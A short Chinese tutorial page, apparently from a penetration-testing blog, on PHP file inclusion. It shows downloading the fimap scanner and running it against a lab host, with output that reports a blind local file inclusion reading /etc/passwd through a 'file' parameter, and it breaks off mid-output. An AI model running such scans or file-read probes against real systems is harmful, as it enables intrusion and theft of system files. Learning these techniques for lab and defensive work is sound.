当前位置: 首页 > 工具软件 > fimap > 使用案例 >

PHP文件包含漏洞 2 fimap

宇文峰
2023-12-01
root@Ubuntu:/pen/web# svn checkout http://fimap.googlecode.com/svn/trunk/ fimap

扫描一下:

root@Ubuntu:/pen/web# cd fimap/src/
root@Ubuntu:/pen/web/fimap/src# ./fimap.py -u "http://5.5.5.3/lif.php?file=info.php" --enable-blind
fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://5.5.5.3/lif.php?file=info.php'
[07:07:59] [OUT] Inspecting URL 'http://5.5.5.3/lif.php?file=info.php'...
[07:07:59] [INFO] Fiddling around with URL...
[07:07:59] [INFO] Sniper failed. Going blind...
[07:07:59] [OUT] Possible file inclusion found blindly! -> 'http://5.5.5.3/lif.php?file=/etc/passwd' with Parameter 'file'.
[07:07:59] [OUT] Identifying Vulnerability 'http://5.5.5.3/lif.php?file=info.php' with Parameter 'fi
 类似资料: